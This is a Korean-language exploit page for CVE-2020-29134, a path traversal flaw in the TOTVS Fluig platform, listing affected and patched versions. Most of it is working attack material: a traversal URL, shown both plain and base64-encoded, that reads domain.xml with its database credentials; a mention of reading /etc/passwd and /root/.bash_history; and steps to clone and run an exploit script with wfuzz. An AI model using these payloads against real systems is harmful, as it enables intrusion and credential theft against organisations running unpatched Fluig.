
CVE-2020-29134 익스플로잇 - TOTVS Fluig Platform - 경로 탐색
Fluig는 ERP 시스템 및 회사의 다른 시스템과 통합되어 사용자와 팀이 일하는 방식을
혁신하는 생산성 및 협업 플랫폼입니다.
TOTVS Fluig 플랫폼은 base64로 인코딩된 매개변수를 통한 경로 탐색을 허용합니다.
이 취약점이 악용되면 데이터베이스에 접근하기 위한 데이터가 포함된 민감한 XML 파일을 읽을 수 있으며,
경우에 따라 LDAP 연결 및 ERP 시스템 통합 데이터도 읽을 수 있습니다.
또한 /etc/passwd 및 /root/.bash_history와 같은 시스템 파일을 탐색할 수도 있습니다.
--
<== Fluig Lake 1.7.0
<== Fluig 1.6.5
<== Fluig 1.6.4
...
<== Fluig Lake 1.7.0-210303 (패치됨)
<== Fluig 1.6.5-210308 (패치됨)
<== Fluig 1.6.4-210308 (패치됨)

http://fluig.host.com/volume/stream/Rmx1aWc=/
?t=1&vol=Default&id=1&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml
P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
http://HOST.FLUIG.COM/volume/stream/Rmx1aWc=/P3Q9MSZ2b2w9RGVmYXVsdCZpZD0xJnZlcj0xMDAwJmZpbGU9Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZmx1aWcvYXBwc2VydmVyL2RvbWFpbi9jb25maWd1cmF0aW9uL2RvbWFpbi54bWw=
https://www.exploit-db.com/exploits/49622
# git clone https://github.com/lucxssouza/CVE-2020-29134.git
# cd CVE-2020-29134
# chmod +x xfluig.sh
예제 1: ./xfluig.sh http://fluig.host.com REQUESTS_WFUZZ (wfuzz가 생성하는 요청 수)
예제 2: ./xfluig.sh http://fluig.host.com:PORT